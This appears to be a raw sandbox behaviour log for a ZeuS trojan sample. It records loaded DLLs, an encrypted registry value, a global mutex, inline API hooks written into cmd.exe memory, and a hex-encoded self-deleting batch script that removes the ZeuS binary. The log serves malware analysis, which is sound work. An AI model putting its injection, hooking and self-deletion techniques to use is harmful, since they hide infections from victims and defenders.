C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 65 64 65 64 39 31 31 65 2E 62 61 74 22 0D 0A 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 1 4AD069F8
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 2A0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 2C0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 310000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 360000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 360000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 360000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 370000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 4B0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 4B0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 4C0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 9A0000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 9A0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 470000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 470000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 470000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 9A0000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat query and read commit C70000 4096 own pid readonly success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 9A0000 618496 own pid readonly object name not found 1 154844
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 154844
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 154844
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 154844
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 154844
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 154844
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 154844
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 154844
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 154844
\KnownDlls\Normaliz.dll write and read and execute unknown 9A0000 36864 own pid read write conflicting addresses 1 154844
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 154844
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 154844
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 154844
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 154844
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 159F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 159FC6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 159EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 159F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 159F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid DisableUNCCheck object name not found 2 4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid EnableExtensions success or wait 2 4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid DelayedExpansion object name not found 2 4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid DefaultColor success or wait 2 4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid PathCompletionChar success or wait 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid AutoRun success or wait 1 4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid PathCompletionChar object name not found 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid AutoRun object name not found 1 4AD04BB8
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 14C0F6
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 15A4F3
2536 C:\WINDOWS\system32\cmd.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 15A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe C50000 10 B8 35 00 00 00 E9 A9 D1 CB 7B success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 5 E9 33 B7 83 83 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5000A 10 68 6C 02 00 00 E9 1E 63 CC 7B success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 5 E9 94 27 83 83 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50014 10 8B FF 55 8B EC E9 7C 11 BC 7B success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C811195 5 E9 CE 79 93 83 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5001E 10 8B FF 55 8B EC E9 9B FA CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 5 E9 97 45 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50028 10 8B FF 55 8B EC E9 5C EE D0 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D95EE89 5 E9 20 52 7F C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50032 10 8B FF 55 8B EC E9 88 A6 D6 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D9BA6BF 5 E9 3E 9A 79 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5003C 10 8B FF 55 8B EC E9 25 A6 D6 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D9BA666 5 E9 33 9B 79 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50046 10 8B FF 55 8B EC E9 3D 90 CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D949088 5 E9 AD B1 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50050 10 8B FF 55 8B EC E9 F6 64 CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94654B 5 E9 2D DD 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5005A 10 8B FF 55 8B EC E9 22 33 D1 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D963381 5 E9 36 0F 7F C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50064 10 8B FF 55 8B EC E9 1A BF CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94BF83 5 E9 7E 83 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C5006E 10 8B FF 55 8B EC E9 1A 87 CF 3C success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94878D 5 E9 A0 BB 80 C2 success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe C50078 10 8B FF 55 8B EC E9 AE 3D E6 70 success or wait 1 15A569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe BD0000 13F6B0 page read and write success or wait 1 154961
2536 C:\WINDOWS\system32\cmd.exe BD0000 13F6B4 page read and write success or wait 1 154961
2536 C:\WINDOWS\system32\cmd.exe C50000 13F484 page execute and read and write success or wait 1 151A36
2536 C:\WINDOWS\system32\cmd.exe C60000 13FE10 page read and write success or wait 1 4AD04578
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C50000 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe C50000 1000 page execute and read and write page execute and read and write success or wait 52 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C5000A 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C50014 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C5001E 1000 page execute and read and write page execute and read and write success or wait 1 15A569
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 15A591
2536 C:\WINDOWS\system32\cmd.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 15A5AD
2536 C:\WINDOWS\system32\cmd.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 15A4CC
2536 C:\WINDOWS\system32\cmd.exe C50028 1000 page execute and read and write page execute and read and write success or wait 1 15A569
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003759249
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003774672
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 2A0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2003785576
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 2C0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003791683
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 310000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003793476
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 360000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2003795033
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 360000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003799457
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 360000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003799611
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2003809456
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2003818739
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2003826713
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2003845133
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2003850423
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 370000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2003857708
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 4B0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2003876399
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 4B0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2003879747
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2003882850
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2003890795
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2003897777
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2003906841
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2003923585
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2003925433
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2003942985
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2003972505
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2004000575
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2004006415
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2004008551
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2004009624
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2004012042
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2004015685
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2004017761
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2004018367
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 4C0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2004021781
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 440000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2004028178
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 440000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2004029104
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2004029988
